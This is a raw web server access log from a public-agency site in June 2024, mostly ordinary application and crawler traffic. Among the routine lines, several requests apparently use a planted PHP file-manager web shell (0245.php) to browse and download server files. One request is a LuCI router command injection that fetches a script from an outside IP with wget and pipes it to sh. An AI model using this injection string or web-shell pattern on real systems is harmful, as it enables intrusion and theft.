161.18.222.72 - - [16/Jun/2024:15:24:59 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 123076
161.18.222.72 - - [16/Jun/2024:15:24:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:24:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:24:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:24:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:24:59 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
66.249.66.21 - - [16/Jun/2024:15:25:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/0801.pdf HTTP/1.1" 200 758426
161.18.222.72 - - [16/Jun/2024:15:25:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36263
161.18.222.72 - - [16/Jun/2024:15:25:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
66.249.66.21 - - [16/Jun/2024:15:25:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/0801.pdf HTTP/1.1" 200 758426
47.128.112.8 - - [16/Jun/2024:15:25:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Cbin&f=tool-wrapper.sh&ft=download HTTP/1.1" 200 5086
201.245.192.253 - - [16/Jun/2024:15:25:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:25:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5733
161.18.222.72 - - [16/Jun/2024:15:25:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120714
161.18.222.72 - - [16/Jun/2024:15:25:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:25 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:25:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 185753
161.18.222.72 - - [16/Jun/2024:15:25:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41887
161.18.222.72 - - [16/Jun/2024:15:25:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:25:44 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5331
47.128.125.148 - - [16/Jun/2024:15:25:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4959.pdf&ft=img&white=1 HTTP/1.1" 200 20239
161.18.222.72 - - [16/Jun/2024:15:25:53 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5415
201.245.192.253 - - [16/Jun/2024:15:26:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
161.18.222.72 - - [16/Jun/2024:15:26:10 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5484
201.245.192.253 - - [16/Jun/2024:15:26:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.43.10 - - [16/Jun/2024:15:26:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2703.pdf&ft=notepad&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C HTTP/1.1" 200 466633
201.245.192.253 - - [16/Jun/2024:15:26:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:15:26:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36422
201.245.192.253 - - [16/Jun/2024:15:26:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34556
47.128.125.10 - - [16/Jun/2024:15:27:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal&f=jurisprudencia.php&ft=download HTTP/1.1" 200 6119
201.245.192.253 - - [16/Jun/2024:15:27:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.24 - - [16/Jun/2024:15:27:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=pmdct3us.pmd&ft=img&white=1 HTTP/1.1" 200 315151
201.245.192.253 - - [16/Jun/2024:15:28:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:28:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:15:26:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.97.183 - - [16/Jun/2024:15:28:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=filetype.pm&ft=download&white=1 HTTP/1.1" 200 3861
161.18.222.72 - - [16/Jun/2024:15:28:49 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 2925
161.18.222.72 - - [16/Jun/2024:15:28:57 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 123867
161.18.222.72 - - [16/Jun/2024:15:28:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:28:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:28:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:28:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:28:58 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:29:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36321
161.18.222.72 - - [16/Jun/2024:15:29:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:29:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:29:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:29:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:29:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
47.128.30.93 - - [16/Jun/2024:15:29:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=async-upload.php&ft=download&white=1 HTTP/1.1" 200 4181
161.18.222.72 - - [16/Jun/2024:15:29:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5883
172.22.2.4 - - [16/Jun/2024:15:27:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:15:29:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:15:28:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34569
201.245.192.253 - - [16/Jun/2024:15:29:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34556
47.128.45.164 - - [16/Jun/2024:15:29:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes%5C&f=list-table.php&ft=download&white=1 HTTP/1.1" 200 3214
201.245.192.253 - - [16/Jun/2024:15:30:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.139 - - [16/Jun/2024:15:30:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=network.php&ft=download&white=1 HTTP/1.1" 200 20133
52.167.144.145 - - [16/Jun/2024:15:31:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2870.pdf HTTP/1.1" 200 575789
201.245.192.253 - - [16/Jun/2024:15:31:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.117.83 - - [16/Jun/2024:15:31:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CID3&f=module.tag.lyrics3.php&ft=download HTTP/1.1" 200 10992
201.245.192.253 - - [16/Jun/2024:15:31:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.35 - - [16/Jun/2024:15:32:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=media-views.min.js&ft=download HTTP/1.1" 200 97949
201.245.192.253 - - [16/Jun/2024:15:32:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.56.232 - - [16/Jun/2024:15:32:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGestion+Documental%5C&f=126PA06-PR13+CONTROL+DOCUMENTOS+EXTERNOS-NORMOGRAMA.pdf&ft=img&white=1 HTTP/1.1" 200 270095
185.191.127.212 - - [16/Jun/2024:15:32:47 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:15:33:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:33:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:15:33:32 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5667
172.22.2.4 - - [16/Jun/2024:15:32:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
47.128.118.127 - - [16/Jun/2024:15:34:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=customize-widgets.js&ft=download HTTP/1.1" 200 60167
172.22.2.4 - - [16/Jun/2024:15:32:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:15:34:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.30.250 - - [16/Jun/2024:15:34:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+2150-2199.tif&ft=notepad&white=1 HTTP/1.1" 200 4923071
114.119.135.172 - - [16/Jun/2024:15:34:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2011/&sort=name&order=desc HTTP/1.1" 200 14290
135.181.214.38 - - [16/Jun/2024:15:34:59 -0500] "GET /IsolucionSDA/BancoConocimiento/R/Resolucion1245de14deAGOSTOde2013/Resolucion1245de14deAGOSTOde2013.asp HTTP/1.1" 404 5016
66.249.66.20 - - [16/Jun/2024:15:35:06 -0500] "GET /Publicaciones/2024EE77570.pdf HTTP/1.1" 404 227
172.22.2.4 - - [16/Jun/2024:15:33:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
201.245.192.253 - - [16/Jun/2024:15:35:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.17 - - [16/Jun/2024:15:35:24 -0500] "GET /Publicaciones/2024EE120630.pdf HTTP/1.1" 200 241851
47.128.118.200 - - [16/Jun/2024:15:35:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=1837.tif&ft=img&white=1 HTTP/1.1" 200 1150724
216.244.66.195 - - [16/Jun/2024:15:35:41 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:15:36:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.61.63 - - [16/Jun/2024:15:36:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=autosave.js&ft=download&white=1 HTTP/1.1" 200 16102
201.245.192.253 - - [16/Jun/2024:15:36:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:36:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120687
161.18.222.72 - - [16/Jun/2024:15:36:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:40 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:36:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 182226
47.128.122.100 - - [16/Jun/2024:15:36:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=0868.pdf&ft=img&white=1 HTTP/1.1" 200 58032
161.18.222.72 - - [16/Jun/2024:15:36:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41534
161.18.222.72 - - [16/Jun/2024:15:36:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:36:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:15:36:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36422
201.245.192.253 - - [16/Jun/2024:15:36:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34556
161.18.222.72 - - [16/Jun/2024:15:37:18 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5322
201.245.192.253 - - [16/Jun/2024:15:37:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:37:25 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5415
47.128.17.189 - - [16/Jun/2024:15:37:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cnavigation&f=NavigationHeader.class.php&ft=download HTTP/1.1" 200 9237
47.128.17.190 - - [16/Jun/2024:15:38:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page55.swf&ft=download&white=1 HTTP/1.1" 200 16000
201.245.192.253 - - [16/Jun/2024:15:38:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:38:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:15:36:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62310
47.128.112.7 - - [16/Jun/2024:15:38:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+1350-1399.tif&ft=notepad&white=1 HTTP/1.1" 200 5177023
201.245.192.253 - - [16/Jun/2024:15:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34569
161.18.222.72 - - [16/Jun/2024:15:39:09 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 123839
161.18.222.72 - - [16/Jun/2024:15:39:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:09 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:39:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36499
161.18.222.72 - - [16/Jun/2024:15:39:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
201.245.192.253 - - [16/Jun/2024:15:39:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:15:39:32 -0500] "GET /BLA/resoluciones/AUTOS%202023/0805.pdf HTTP/1.1" 200 602310
161.18.222.72 - - [16/Jun/2024:15:39:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5676
161.18.222.72 - - [16/Jun/2024:15:39:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120833
161.18.222.72 - - [16/Jun/2024:15:39:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.96.165 - - [16/Jun/2024:15:39:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=ms-sites.php&ft=download&white=1 HTTP/1.1" 200 228
161.18.222.72 - - [16/Jun/2024:15:39:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:39:36 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [16/Jun/2024:15:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34556
52.167.144.230 - - [16/Jun/2024:15:39:48 -0500] "GET /inscribete-y-participa-en-el-foro-sobre-la-gestion-de-los-bifenilos-policlorados-en-transformadores-electricos.html HTTP/1.1" 200 931
172.22.2.4 - - [16/Jun/2024:15:38:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.45.226 - - [16/Jun/2024:15:40:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2010.tif&ft=img&white=1 HTTP/1.1" 200 178788
201.245.192.253 - - [16/Jun/2024:15:40:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:15:40:55 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
161.18.222.72 - - [16/Jun/2024:15:40:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 300974
47.128.46.4 - - [16/Jun/2024:15:40:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6224.pdf&ft=img&white=1 HTTP/1.1" 200 356111
172.22.2.4 - - [16/Jun/2024:15:39:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:15:41:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
161.18.222.72 - - [16/Jun/2024:15:41:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41876
161.18.222.72 - - [16/Jun/2024:15:41:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:41:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:41:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:41:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:15:41:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:41:25 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5331
135.181.214.38 - - [16/Jun/2024:15:41:27 -0500] "GET /ISOlucionSDA/bancoconocimiento/R/Resolucion2269del20dediciembrede2016/Resolucion2269del20dediciembrede2016.asp HTTP/1.1" 404 5032
161.18.222.72 - - [16/Jun/2024:15:41:36 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5415
47.128.113.103 - - [16/Jun/2024:15:41:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2793.pdf&ft=img&white=1 HTTP/1.1" 200 405263
201.245.192.253 - - [16/Jun/2024:15:42:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
